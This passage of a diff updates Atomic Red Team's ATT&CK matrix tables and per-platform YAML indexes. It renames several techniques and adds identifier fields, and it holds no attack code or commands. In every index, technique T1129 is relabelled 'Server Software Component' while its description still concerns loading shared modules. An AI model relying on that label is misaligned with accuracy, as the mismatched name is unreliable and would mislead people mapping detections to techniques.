[CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -100,7 +100,7 @@
 |  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Build Image on Host](../../T1612/T1612.md) |  |  |  |  |  |  |  |
 |  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) |  |  |  |  |  |  |  |
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -77,7 +77,7 @@
 |  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) |  |  |  |  |  |  |  |
 |  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/azure-ad-index.yaml

@@ -7389,7 +7389,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7475,6 +7475,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23551,7 +23552,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23622,6 +23623,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -40282,7 +40284,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -40328,6 +40330,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/containers-index.yaml

@@ -7364,7 +7364,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7450,6 +7450,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23164,7 +23165,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23235,6 +23236,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39557,7 +39559,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39603,6 +39605,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -22976,7 +22977,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23047,6 +23048,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39177,7 +39179,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39223,6 +39225,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -22860,7 +22861,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -22931,6 +22932,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39003,7 +39005,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39049,6 +39051,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23231,7 +23232,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23302,6 +23303,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39508,7 +39510,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39554,6 +39556,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23255,7 +23256,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23326,6 +23327,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39727,7 +39729,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39773,6 +39775,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23209,7 +23210,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23280,6 +23281,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39543,7 +39545,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39589,6 +39591,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/index.yaml

